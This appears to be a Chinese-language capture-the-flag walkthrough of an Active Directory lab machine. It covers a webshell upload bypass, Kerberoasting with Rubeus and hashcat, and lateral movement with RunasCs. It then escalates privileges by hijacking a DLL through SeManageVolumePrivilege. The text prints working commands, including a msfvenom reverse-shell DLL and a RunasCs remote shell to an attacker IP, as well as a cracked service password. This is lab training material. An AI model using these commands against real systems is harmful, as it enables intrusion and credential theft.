老样子先扫端口,依旧没啥太多好玩的
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Access The Event
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-18 01:33:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain:access.offsec0., Site: Default-First-Site-Name)
443/tcp open ssl/http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-title: Access The Event
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp closed unknown
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49776/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-06-18T01:34:15
|_ start_date: N/A先看常规80端口,在这个网页存在一个上传图片的地方,就在这个购买地方点击即可看到(不要问我咋发现的,问就是把所有端口搞了一下,最后没法子了在这个网页瞎点点出来的)
然后这里可以用kali自带的php马子,但是呢我用了发现还是reverse.com的php马子好使
然后呢就是抓包改包了,由于我们上传的png图片要改一下后缀,而且这个后缀改完之后记得加上俩点,要不然上传会不成功,返回包跟我一样就代表上传成功了
这里也是展示一下reverse.com上的马子,给了大家两种选择怎么舒服怎么来
然后就是老样子用编码过后的反弹shell的命令进行反弹
当然这个上传接口是通过dirsearch跑出来的,我忘截图了但是我相信大家应该不会少了这一步吧
也是成功拿到了初始shell
然后这个靶场是ad环境的靶场,所以肯定要用一下bloodhound了,但是没有初始票据,所以不能用bloodhound-python去跑,只能上一个sharphound了
然后这台靶机不知道啥问题传输文件居然只能用nc传输,并且大家需要注意nc传输命令必须在cmd窗口执行
然后就是在分析窗口挨个点一下(开玩笑的啦,由于在端口扫描中看到了kerberoast,所以看一下靶机环境下有没有Kerberos用户)。果然发现了svc_mssql是kerberoast用户
然后由于还是没有初始票据的原因,所以我们用rubeus进行提取hash的操作,这里也是成功提取除了svc_mssql用户的票据
./Rebeus.exe kerberoast /nowrap
然后就是使用hashcat进行破解,成功拿到密码
本来想用原先靶场中用到的runas命令进行横向转移,但是不知道为啥就是用不了
于是我果断又找了一种runnas的登录用法,在powershell中执行这两条命令便可拿到svc_mssql用户的shell
Import-Module .\Invoke-RunasCs.ps1
Invoke-RunasCs svc_mssql trustno1 cmd.exe -Remote 192.168.45.230:3344
展示成果,别看这里是什么system32但权限不是administrator,不要高兴太早
然后在这个权限下我看了看有没有可以劫持的exe或者dll,这里sharpup扫出来的exe劫持直接忽略掉就好,提不了权不用试了
然后老样子再用winpeas看看在当前用户下有无新东西,结果别说还真有,有的还真比较新我都没学过,找外援才知道这个semanagevolumeprivilege存在提权点
这个提权操作很简单,就是构造一个这个名字恶意的dll,然后做一下劫持就好
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.230 LPORT=3344 -f dll -o Printconfig.dll
然后再把这个exe执行程序下一下,要不然写不进去dll
再然后就是i输入这两条命令就可以实现反弹shell了
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)这里展示一下我转移的dll文件
也是成功拿到管理员权限
总结:
这个靶场难度不大,主要是提权点比较新,然后就是工具的合理利用,其他也就没啥了,增长见识用的靶场。
链接:
antonioCoco/RunasCs: RunasCs - Csharp and open version of windows builtin runas.exe
GhostPack/Rubeus: Trying to tame the three-headed dog.
Release SeManageVolumeExploit · CsEnox/SeManageVolumeExploit